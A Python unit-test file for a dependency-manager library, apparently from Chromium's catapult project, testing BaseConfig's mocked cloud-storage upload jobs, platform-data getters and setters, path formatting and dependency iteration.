self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
expected_exists_calls = [mock.call(self.new_bucket, self.new_remote_path)]
expected_insert_calls = [mock.call(self.new_bucket, self.new_remote_path,
self.new_dep_path)]
expected_copy_calls = [mock.call(self.new_bucket, self.new_bucket,
self.new_remote_path,
self.expected_new_backup_path)]
self.assertTrue(config.ExecuteUpdateJobs(force=True))
self.assertFalse(config._IsDirty())
self.assertFalse(config._pending_uploads)
self.assertEqual(self.new_dependencies, config._config_data)
file_module = fake_filesystem.FakeFileOpen(self.fs)
expected_file_lines = list(self.new_expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
self.assertFalse(config._pending_uploads)
self.assertEqual(expected_insert_calls,
uploader_cs_mock.Insert.call_args_list)
self.assertEqual(expected_exists_calls,
uploader_cs_mock.Exists.call_args_list)
self.assertEqual(expected_copy_calls,
uploader_cs_mock.Copy.call_args_list)
@mock.patch('dependency_manager.uploader.cloud_storage')
def testExecuteUpdateJobsErrorOnePendingDepCloudStorageCollisionNoForce(
self, uploader_cs_mock):
uploader_cs_mock.Exists.return_value = True
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
config._config_data = self.new_dependencies.copy()
config._is_dirty = True
config._pending_uploads = [self.new_pending_upload]
self.assertEqual(self.new_dependencies, config._config_data)
self.assertTrue(config._is_dirty)
self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
expected_exists_calls = [mock.call(self.new_bucket, self.new_remote_path)]
expected_insert_calls = []
expected_copy_calls = []
self.assertRaises(dependency_manager.CloudStorageUploadConflictError,
config.ExecuteUpdateJobs)
self.assertTrue(config._is_dirty)
self.assertTrue(config._pending_uploads)
self.assertEqual(self.new_dependencies, config._config_data)
self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
file_module = fake_filesystem.FakeFileOpen(self.fs)
expected_file_lines = list(self.expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
self.assertEqual(expected_insert_calls,
uploader_cs_mock.Insert.call_args_list)
self.assertEqual(expected_exists_calls,
uploader_cs_mock.Exists.call_args_list)
self.assertEqual(expected_copy_calls,
uploader_cs_mock.Copy.call_args_list)
@mock.patch('dependency_manager.uploader.cloud_storage')
def testExecuteUpdateJobsSuccessMultiplePendingDepsOneCloudStorageCollision(
self, uploader_cs_mock):
uploader_cs_mock.Exists.side_effect = [False, True]
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
config._config_data = self.final_dependencies.copy()
config._pending_uploads = [self.new_pending_upload,
self.final_pending_upload]
self.assertEqual(self.final_dependencies, config._config_data)
self.assertTrue(config._IsDirty())
self.assertEqual(2, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.final_pending_upload, config._pending_uploads[1])
expected_exists_calls = [mock.call(self.new_bucket, self.new_remote_path),
mock.call(self.final_bucket,
self.final_remote_path)]
expected_insert_calls = [mock.call(self.new_bucket, self.new_remote_path,
self.new_dep_path),
mock.call(self.final_bucket,
self.final_remote_path,
self.final_dep_path)]
expected_copy_calls = [mock.call(self.final_bucket, self.final_bucket,
self.final_remote_path,
self.expected_final_backup_path)]
self.assertTrue(config.ExecuteUpdateJobs(force=True))
self.assertFalse(config._IsDirty())
self.assertFalse(config._pending_uploads)
self.assertEqual(self.final_dependencies, config._config_data)
file_module = fake_filesystem.FakeFileOpen(self.fs)
expected_file_lines = list(self.final_expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
self.assertFalse(config._pending_uploads)
self.assertEqual(expected_insert_calls,
uploader_cs_mock.Insert.call_args_list)
self.assertEqual(expected_exists_calls,
uploader_cs_mock.Exists.call_args_list)
self.assertEqual(expected_copy_calls,
uploader_cs_mock.Copy.call_args_list)
@mock.patch('dependency_manager.uploader.cloud_storage')
def testUpdateCloudStorageDependenciesReadOnlyConfig(
self, uploader_cs_mock):
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path)
with self.assertRaises(dependency_manager.ReadWriteError):
config.AddCloudStorageDependencyUpdateJob(
'dep', 'plat', 'path')
with self.assertRaises(dependency_manager.ReadWriteError):
config.AddCloudStorageDependencyUpdateJob(
'dep', 'plat', 'path', version='1.2.3')
with self.assertRaises(dependency_manager.ReadWriteError):
config.AddCloudStorageDependencyUpdateJob(
'dep', 'plat', 'path', execute_job=False)
with self.assertRaises(dependency_manager.ReadWriteError):
config.AddCloudStorageDependencyUpdateJob(
'dep', 'plat', 'path', version='1.2.3', execute_job=False)
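  # Writable is opt-in: a config constructed without writable=True is
  # expected to reject every AddCloudStorageDependencyUpdateJob variant
  # with ReadWriteError before any upload work starts.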
@mock.patch('dependency_manager.uploader.cloud_storage')
def testUpdateCloudStorageDependenciesMissingDependency(
self, uploader_cs_mock):
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
self.assertRaises(ValueError, config.AddCloudStorageDependencyUpdateJob,
'dep', 'plat', 'path')
self.assertRaises(ValueError, config.AddCloudStorageDependencyUpdateJob,
'dep', 'plat', 'path', version='1.2.3')
self.assertRaises(ValueError, config.AddCloudStorageDependencyUpdateJob,
'dep', 'plat', 'path', execute_job=False)
self.assertRaises(ValueError, config.AddCloudStorageDependencyUpdateJob,
'dep', 'plat', 'path', version='1.2.3', execute_job=False)
@mock.patch('dependency_manager.uploader.cloud_storage')
@mock.patch('dependency_manager.base_config.cloud_storage')
def testUpdateCloudStorageDependenciesWrite(
self, base_config_cs_mock, uploader_cs_mock):
expected_dependencies = self.dependencies
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
self.assertFalse(config._IsDirty())
self.assertEqual(expected_dependencies, config._config_data)
base_config_cs_mock.CalculateHash.return_value = self.new_dep_hash
uploader_cs_mock.Exists.return_value = False
expected_dependencies = self.new_dependencies
config.AddCloudStorageDependencyUpdateJob(
'dep1', 'plat2', self.new_dep_path, execute_job=True)
self.assertFalse(config._IsDirty())
self.assertFalse(config._pending_uploads)
self.assertEqual(expected_dependencies, config._config_data)
    # check that file contents have been updated
file_module = fake_filesystem.FakeFileOpen(self.fs)
expected_file_lines = list(self.new_expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
expected_dependencies = self.final_dependencies
base_config_cs_mock.CalculateHash.return_value = self.final_dep_hash
config.AddCloudStorageDependencyUpdateJob(
'dep2', 'plat1', self.final_dep_path, execute_job=True)
self.assertFalse(config._IsDirty())
self.assertFalse(config._pending_uploads)
self.assertEqual(expected_dependencies, config._config_data)
    # check that file contents have been updated
expected_file_lines = list(self.final_expected_file_lines)
file_module = fake_filesystem.FakeFileOpen(self.fs)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
@mock.patch('dependency_manager.uploader.cloud_storage')
@mock.patch('dependency_manager.base_config.cloud_storage')
def testUpdateCloudStorageDependenciesNoWrite(
self, base_config_cs_mock, uploader_cs_mock):
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
self.assertRaises(ValueError, config.AddCloudStorageDependencyUpdateJob,
'dep', 'plat', 'path')
self.assertRaises(ValueError, config.AddCloudStorageDependencyUpdateJob,
'dep', 'plat', 'path', version='1.2.3')
expected_dependencies = self.dependencies
config = dependency_manager.BaseConfig(self.file_path, writable=True)
self.assertFalse(config._IsDirty())
self.assertFalse(config._pending_uploads)
self.assertEqual(expected_dependencies, config._config_data)
base_config_cs_mock.CalculateHash.return_value = self.new_dep_hash
uploader_cs_mock.Exists.return_value = False
expected_dependencies = self.new_dependencies
config.AddCloudStorageDependencyUpdateJob(
'dep1', 'plat2', self.new_dep_path, execute_job=False)
self.assertTrue(config._IsDirty())
self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(expected_dependencies, config._config_data)
# check that file contents have not been updated.
expected_file_lines = list(self.expected_file_lines)
file_module = fake_filesystem.FakeFileOpen(self.fs)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
expected_dependencies = self.final_dependencies
base_config_cs_mock.CalculateHash.return_value = self.final_dep_hash
config.AddCloudStorageDependencyUpdateJob(
'dep2', 'plat1', self.final_dep_path, execute_job=False)
self.assertTrue(config._IsDirty())
self.assertEqual(expected_dependencies, config._config_data)
# check that file contents have not been updated.
expected_file_lines = list(self.expected_file_lines)
file_module = fake_filesystem.FakeFileOpen(self.fs)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
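# A minimal usage sketch (added; not part of the original suite): the public
# flow that the class above simulates with pyfakefs and cloud_storage mocks.
# Argument names are illustrative; it assumes a writable config file and a
# real cloud-storage backend.
def _ExampleUpdateFlow(config_path, dep_path):
  config = dependency_manager.BaseConfig(config_path, writable=True)
  # Queue an upload for dep1/plat2 without running it yet.
  config.AddCloudStorageDependencyUpdateJob(
      'dep1', 'plat2', dep_path, execute_job=False)
  # Uploads every queued file, then rewrites the config file on success.
  config.ExecuteUpdateJobs()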
class BaseConfigDataManipulationUnittests(fake_filesystem_unittest.TestCase):
def setUp(self):
self.addTypeEqualityFunc(uploader.CloudStorageUploader,
uploader.CloudStorageUploader.__eq__)
self.setUpPyfakefs()
self.cs_bucket = 'bucket1'
self.cs_base_folder = 'dependencies_folder'
self.cs_hash = 'hash12'
self.download_path = '../../relative/dep1/path2'
self.local_paths = ['../../../relative/local/path21',
'../../../relative/local/path22']
self.platform_dict = {'cloud_storage_hash': self.cs_hash,
'download_path': self.download_path,
'local_paths': self.local_paths}
self.dependencies = {
'dep1': {
'cloud_storage_bucket': self.cs_bucket,
'cloud_storage_base_folder': self.cs_base_folder,
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash11',
'download_path': '../../relative/dep1/path1',
'local_paths': ['../../../relative/local/path11',
'../../../relative/local/path12']},
'plat2': self.platform_dict
}
},
'dep2': {
'cloud_storage_bucket': 'bucket2',
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash21',
'download_path': '../../relative/dep2/path1',
'local_paths': ['../../../relative/local/path31',
'../../../relative/local/path32']},
'plat2': {
'cloud_storage_hash': 'hash22',
'download_path': '../../relative/dep2/path2'}}}}
self.file_path = os.path.abspath(os.path.join(
'path', 'to', 'config', 'file'))
self.expected_file_lines = [
# pylint: disable=bad-continuation
'{', '"config_type": "BaseConfig",', '"dependencies": {',
'"dep1": {', '"cloud_storage_base_folder": "dependencies_folder",',
'"cloud_storage_bucket": "bucket1",', '"file_info": {',
'"plat1": {', '"cloud_storage_hash": "hash11",',
'"download_path": "../../relative/dep1/path1",',
'"local_paths": [', '"../../../relative/local/path11",',
'"../../../relative/local/path12"', ']', '},',
'"plat2": {', '"cloud_storage_hash": "hash12",',
'"download_path": "../../relative/dep1/path2",',
'"local_paths": [', '"../../../relative/local/path21",',
'"../../../relative/local/path22"', ']',
'}', '}', '},',
'"dep2": {', '"cloud_storage_bucket": "bucket2",', '"file_info": {',
'"plat1": {', '"cloud_storage_hash": "hash21",',
'"download_path": "../../relative/dep2/path1",',
'"local_paths": [', '"../../../relative/local/path31",',
'"../../../relative/local/path32"', ']', '},',
'"plat2": {', '"cloud_storage_hash": "hash22",',
'"download_path": "../../relative/dep2/path2"', '}', '}', '}',
'}', '}']
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
def testSetPlatformDataFailureNotWritable(self):
config = dependency_manager.BaseConfig(self.file_path)
self.assertRaises(
dependency_manager.ReadWriteError, config._SetPlatformData,
'dep1', 'plat1', 'cloud_storage_bucket', 'new_bucket')
self.assertEqual(self.dependencies, config._config_data)
def testSetPlatformDataFailure(self):
config = dependency_manager.BaseConfig(self.file_path, writable=True)
self.assertRaises(ValueError, config._SetPlatformData, 'missing_dep',
'plat2', 'cloud_storage_bucket', 'new_bucket')
self.assertEqual(self.dependencies, config._config_data)
self.assertRaises(ValueError, config._SetPlatformData, 'dep1',
'missing_plat', 'cloud_storage_bucket', 'new_bucket')
self.assertEqual(self.dependencies, config._config_data)
def testSetPlatformDataCloudStorageBucketSuccess(self):
config = dependency_manager.BaseConfig(self.file_path, writable=True)
updated_cs_dependencies = {
'dep1': {'cloud_storage_bucket': 'new_bucket',
'cloud_storage_base_folder': 'dependencies_folder',
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash11',
'download_path': '../../relative/dep1/path1',
'local_paths': ['../../../relative/local/path11',
'../../../relative/local/path12']},
'plat2': {
'cloud_storage_hash': 'hash12',
'download_path': '../../relative/dep1/path2',
'local_paths': ['../../../relative/local/path21',
'../../../relative/local/path22']}}},
'dep2': {'cloud_storage_bucket': 'bucket2',
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash21',
'download_path': '../../relative/dep2/path1',
'local_paths': ['../../../relative/local/path31',
'../../../relative/local/path32']},
'plat2': {
'cloud_storage_hash': 'hash22',
'download_path': '../../relative/dep2/path2'}}}}
config._SetPlatformData('dep1', 'plat2', 'cloud_storage_bucket',
'new_bucket')
self.assertEqual(updated_cs_dependencies, config._config_data)
def testSetPlatformDataCloudStorageBaseFolderSuccess(self):
config = dependency_manager.BaseConfig(self.file_path, writable=True)
updated_cs_dependencies = {
'dep1': {'cloud_storage_bucket': 'bucket1',
'cloud_storage_base_folder': 'new_dependencies_folder',
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash11',
'download_path': '../../relative/dep1/path1',
'local_paths': ['../../../relative/local/path11',
'../../../relative/local/path12']},
'plat2': {
'cloud_storage_hash': 'hash12',
'download_path': '../../relative/dep1/path2',
'local_paths': ['../../../relative/local/path21',
'../../../relative/local/path22']}}},
'dep2': {'cloud_storage_bucket': 'bucket2',
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash21',
'download_path': '../../relative/dep2/path1',
'local_paths': ['../../../relative/local/path31',
'../../../relative/local/path32']},
'plat2': {
'cloud_storage_hash': 'hash22',
'download_path': '../../relative/dep2/path2'}}}}
config._SetPlatformData('dep1', 'plat2', 'cloud_storage_base_folder',
'new_dependencies_folder')
self.assertEqual(updated_cs_dependencies, config._config_data)
def testSetPlatformDataHashSuccess(self):
config = dependency_manager.BaseConfig(self.file_path, writable=True)
updated_cs_dependencies = {
'dep1': {'cloud_storage_bucket': 'bucket1',
'cloud_storage_base_folder': 'dependencies_folder',
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash11',
'download_path': '../../relative/dep1/path1',
'local_paths': ['../../../relative/local/path11',
'../../../relative/local/path12']},
'plat2': {
'cloud_storage_hash': 'new_hash',
'download_path': '../../relative/dep1/path2',
'local_paths': ['../../../relative/local/path21',
'../../../relative/local/path22']}}},
'dep2': {'cloud_storage_bucket': 'bucket2',
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash21',
'download_path': '../../relative/dep2/path1',
'local_paths': ['../../../relative/local/path31',
'../../../relative/local/path32']},
'plat2': {
'cloud_storage_hash': 'hash22',
'download_path': '../../relative/dep2/path2'}}}}
config._SetPlatformData('dep1', 'plat2', 'cloud_storage_hash',
'new_hash')
self.assertEqual(updated_cs_dependencies, config._config_data)
def testSetPlatformDataDownloadPathSuccess(self):
config = dependency_manager.BaseConfig(self.file_path, writable=True)
updated_cs_dependencies = {
'dep1': {'cloud_storage_bucket': 'bucket1',
'cloud_storage_base_folder': 'dependencies_folder',
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash11',
'download_path': '../../relative/dep1/path1',
'local_paths': ['../../../relative/local/path11',
'../../../relative/local/path12']},
'plat2': {
'cloud_storage_hash': 'hash12',
'download_path': '../../new/dep1/path2',
'local_paths': ['../../../relative/local/path21',
'../../../relative/local/path22']}}},
'dep2': {'cloud_storage_bucket': 'bucket2',
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash21',
'download_path': '../../relative/dep2/path1',
'local_paths': ['../../../relative/local/path31',
'../../../relative/local/path32']},
'plat2': {
'cloud_storage_hash': 'hash22',
'download_path': '../../relative/dep2/path2'}}}}
config._SetPlatformData('dep1', 'plat2', 'download_path',
'../../new/dep1/path2')
self.assertEqual(updated_cs_dependencies, config._config_data)
def testSetPlatformDataLocalPathSuccess(self):
config = dependency_manager.BaseConfig(self.file_path, writable=True)
updated_cs_dependencies = {
'dep1': {'cloud_storage_bucket': 'bucket1',
'cloud_storage_base_folder': 'dependencies_folder',
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash11',
'download_path': '../../relative/dep1/path1',
'local_paths': ['../../../relative/local/path11',
'../../../relative/local/path12']},
'plat2': {
'cloud_storage_hash': 'hash12',
'download_path': '../../relative/dep1/path2',
'local_paths': ['../../new/relative/local/path21',
'../../new/relative/local/path22']}}},
'dep2': {'cloud_storage_bucket': 'bucket2',
'file_info': {
'plat1': {
'cloud_storage_hash': 'hash21',
'download_path': '../../relative/dep2/path1',
'local_paths': ['../../../relative/local/path31',
'../../../relative/local/path32']},
'plat2': {
'cloud_storage_hash': 'hash22',
'download_path': '../../relative/dep2/path2'}}}}
config._SetPlatformData('dep1', 'plat2', 'local_paths',
['../../new/relative/local/path21',
'../../new/relative/local/path22'])
self.assertEqual(updated_cs_dependencies, config._config_data)
def testGetPlatformDataFailure(self):
config = dependency_manager.BaseConfig(self.file_path, writable=True)
self.assertRaises(ValueError, config._GetPlatformData, 'missing_dep',
'plat2', 'cloud_storage_bucket')
self.assertEqual(self.dependencies, config._config_data)
self.assertRaises(ValueError, config._GetPlatformData, 'dep1',
'missing_plat', 'cloud_storage_bucket')
self.assertEqual(self.dependencies, config._config_data)
def testGetPlatformDataDictSuccess(self):
config = dependency_manager.BaseConfig(self.file_path, writable=True)
self.assertEqual(self.platform_dict,
config._GetPlatformData('dep1', 'plat2'))
self.assertEqual(self.dependencies, config._config_data)
def testGetPlatformDataCloudStorageBucketSuccess(self):
config = dependency_manager.BaseConfig(self.file_path, writable=True)
self.assertEqual(self.cs_bucket, config._GetPlatformData(
'dep1', 'plat2', 'cloud_storage_bucket'))
self.assertEqual(self.dependencies, config._config_data)
def testGetPlatformDataCloudStorageBaseFolderSuccess(self):
config = dependency_manager.BaseConfig(self.file_path, writable=True)
self.assertEqual(self.cs_base_folder, config._GetPlatformData(
'dep1', 'plat2', 'cloud_storage_base_folder'))
self.assertEqual(self.dependencies, config._config_data)
def testGetPlatformDataHashSuccess(self):
config = dependency_manager.BaseConfig(self.file_path, writable=True)
self.assertEqual(self.cs_hash, config._GetPlatformData(
'dep1', 'plat2', 'cloud_storage_hash'))
self.assertEqual(self.dependencies, config._config_data)
def testGetPlatformDataDownloadPathSuccess(self):
config = dependency_manager.BaseConfig(self.file_path, writable=True)
self.assertEqual(self.download_path, config._GetPlatformData(
'dep1', 'plat2', 'download_path'))
self.assertEqual(self.dependencies, config._config_data)
def testGetPlatformDataLocalPathSuccess(self):
config = dependency_manager.BaseConfig(self.file_path, writable=True)
self.assertEqual(self.local_paths, config._GetPlatformData(
'dep1', 'plat2', 'local_paths'))
self.assertEqual(self.dependencies, config._config_data)
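# A hedged sketch (added) of the private accessors exercised above. The call
# shapes are taken from the tests themselves; these are internal APIs, not
# documented ones.
def _ExamplePlatformDataAccess(config):
  # Read one field for dep1/plat2, then write it back unchanged; with no
  # field name, _GetPlatformData returns the whole platform dict.
  bucket = config._GetPlatformData('dep1', 'plat2', 'cloud_storage_bucket')
  config._SetPlatformData('dep1', 'plat2', 'cloud_storage_bucket', bucket)
  return config._GetPlatformData('dep1', 'plat2')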
class BaseConfigTest(unittest.TestCase):
""" Subclassable unittests for BaseConfig.
For subclasses: override setUp, GetConfigDataFromDict,
and EndToEndExpectedConfigData as needed.
setUp must set the following properties:
    self.config_type: String returned from GetConfigType in config subclass.
self.config_class: the class for the config subclass.
self.config_module: importable module for the config subclass.
self.empty_dict: expected dictionary for an empty config, as it would be
stored in a json file.
self.one_dep_dict: example dictionary for a config with one dependency,
as it would be stored in a json file.
"""
def setUp(self):
self.config_type = 'BaseConfig'
self.config_class = dependency_manager.BaseConfig
self.config_module = 'dependency_manager.base_config'
self.empty_dict = {'config_type': self.config_type,
'dependencies': {}}
dependency_dict = {
'dep': {
'cloud_storage_base_folder': 'cs_base_folder1',
'cloud_storage_bucket': 'bucket1',
'file_info': {
'plat1_arch1': {
'cloud_storage_hash': 'hash111',
'download_path': 'download_path111',
'cs_remote_path': 'cs_path111',
'version_in_cs': 'version_111',
'local_paths': ['local_path1110', 'local_path1111']
},
'plat1_arch2': {
'cloud_storage_hash': 'hash112',
'download_path': 'download_path112',
'cs_remote_path': 'cs_path112',
'local_paths': ['local_path1120', 'local_path1121']
},
'win_arch1': {
'cloud_storage_hash': 'hash1w1',
'download_path': 'download\\path\\1w1',
'cs_remote_path': 'cs_path1w1',
'local_paths': ['local\\path\\1w10', 'local\\path\\1w11']
},
'all_the_variables': {
'cloud_storage_hash': 'hash111',
'download_path': 'download_path111',
'cs_remote_path': 'cs_path111',
'version_in_cs': 'version_111',
'path_in_archive': 'path/in/archive',
'local_paths': ['local_path1110', 'local_path1111']
}
}
}
}
self.one_dep_dict = {'config_type': self.config_type,
'dependencies': dependency_dict}
def GetConfigDataFromDict(self, config_dict):
return config_dict.get('dependencies', {})
@mock.patch('os.path')
@mock.patch('__builtin__.open')
def testInitBaseProperties(self, open_mock, path_mock):
# Init is not meant to be overridden, so we should be mocking the
# base_config's json module, even in subclasses.
json_module = 'dependency_manager.base_config.json'
with mock.patch(json_module) as json_mock:
json_mock.load.return_value = self.empty_dict.copy()
config = self.config_class('file_path')
self.assertEqual('file_path', config._config_path)
self.assertEqual(self.config_type, config.GetConfigType())
self.assertEqual(self.GetConfigDataFromDict(self.empty_dict),
config._config_data)

  @mock.patch('dependency_manager.dependency_info.DependencyInfo')
  @mock.patch('os.path')
  @mock.patch('__builtin__.open')
  def testInitWithDependencies(self, open_mock, path_mock, dep_info_mock):
    # Init is not meant to be overridden, so we should be mocking the
    # base_config's json module, even in subclasses.
    json_module = 'dependency_manager.base_config.json'
    with mock.patch(json_module) as json_mock:
      json_mock.load.return_value = self.one_dep_dict
      config = self.config_class('file_path')
      self.assertEqual('file_path', config._config_path)
      self.assertEqual(self.config_type, config.GetConfigType())
      self.assertEqual(self.GetConfigDataFromDict(self.one_dep_dict),
                       config._config_data)

  def testFormatPath(self):
    self.assertEqual(None, self.config_class._FormatPath(None))
    self.assertEqual('', self.config_class._FormatPath(''))
    self.assertEqual('some_string',
                     self.config_class._FormatPath('some_string'))
    expected_path = os.path.join('some', 'file', 'path')
    self.assertEqual(expected_path,
                     self.config_class._FormatPath('some/file/path'))
    self.assertEqual(expected_path,
                     self.config_class._FormatPath('some\\file\\path'))
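
  # The assertions above are consistent with a minimal _FormatPath along the
  # following lines. This is a sketch of plausible behavior only, not
  # necessarily base_config's actual implementation:
  #
  #   @classmethod
  #   def _FormatPath(cls, file_path):
  #     if not file_path:
  #       return file_path
  #     if os.path.sep != '\\':
  #       return file_path.replace('\\', os.path.sep)
  #     elif os.path.sep != '/':
  #       return file_path.replace('/', os.path.sep)
  #     return file_path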

  @mock.patch('dependency_manager.base_config.json')
  @mock.patch('dependency_manager.dependency_info.DependencyInfo')
  @mock.patch('os.path.exists')
  @mock.patch('__builtin__.open')
  def testIterDependenciesError(
      self, open_mock, exists_mock, dep_info_mock, json_mock):
    # Init is not meant to be overridden, so we should be mocking the
    # base_config's json module, even in subclasses.
    json_mock.load.return_value = self.one_dep_dict
    config = self.config_class('file_path', writable=True)
    self.assertEqual(self.GetConfigDataFromDict(self.one_dep_dict),
                     config._config_data)
    self.assertTrue(config._writable)
    # A writable config cannot be iterated over; it must raise instead.
    with self.assertRaises(dependency_manager.ReadWriteError):
      for _ in config.IterDependencyInfo():
        pass

  @mock.patch('dependency_manager.base_config.json')
  @mock.patch('dependency_manager.dependency_info.DependencyInfo')
  @mock.patch('os.path.exists')
  @mock.patch('__builtin__.open')
  def testIterDependencies(
      self, open_mock, exists_mock, dep_info_mock, json_mock):
    json_mock.load.return_value = self.one_dep_dict
    config = self.config_class('file_path')
    self.assertEqual(self.GetConfigDataFromDict(self.one_dep_dict),
                     config._config_data)

    expected_dep_info = ['dep_info0', 'dep_info1', 'dep_info2']
    dep_info_mock.side_effect = expected_dep_info
    expected_calls = [
        mock.call('dep', 'plat1_arch1', 'file_path', cs_bucket='bucket1',
                  cs_hash='hash111', download_path='download_path111',
                  cs_remote_path='cs_path111',
                  local_paths=['local_path1110', 'local_path1111']),
        mock.call('dep', 'plat1_arch2', 'file_path', cs_bucket='bucket1',
                  cs_hash='hash112', download_path='download_path112',
                  cs_remote_path='cs_path112',
                  local_paths=['local_path1120', 'local_path1121']),
        mock.call('dep', 'win_arch1', 'file_path', cs_bucket='bucket1',
                  cs_hash='hash1w1',
                  download_path=os.path.join('download', 'path', '1w1'),
                  cs_remote_path='cs_path1w1',
                  local_paths=[os.path.join('local', 'path', '1w10'),
                               os.path.join('local', 'path', '1w11')])]
    deps_seen = []
    for dep_info in config.IterDependencyInfo():
      deps_seen.append(dep_info)
    # assert_call_args is not a real mock assertion and would silently pass;
    # assert_has_calls actually verifies the recorded calls.
    dep_info_mock.assert_has_calls(expected_calls, any_order=True)
    self.assertItemsEqual(expected_dep_info, deps_seen)
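

# A minimal sketch of how a config subclass could reuse BaseConfigTest via
# the hooks documented in its docstring. FakeConfig and fake_config are
# hypothetical names used only for illustration; they are not part of
# dependency_manager.
#
# class FakeConfigTest(BaseConfigTest):
#
#   def setUp(self):
#     super(FakeConfigTest, self).setUp()
#     self.config_type = 'FakeConfig'
#     self.config_class = fake_config.FakeConfig
#     self.config_module = 'fake_config'
#     self.empty_dict['config_type'] = self.config_type
#     self.one_dep_dict['config_type'] = self.config_type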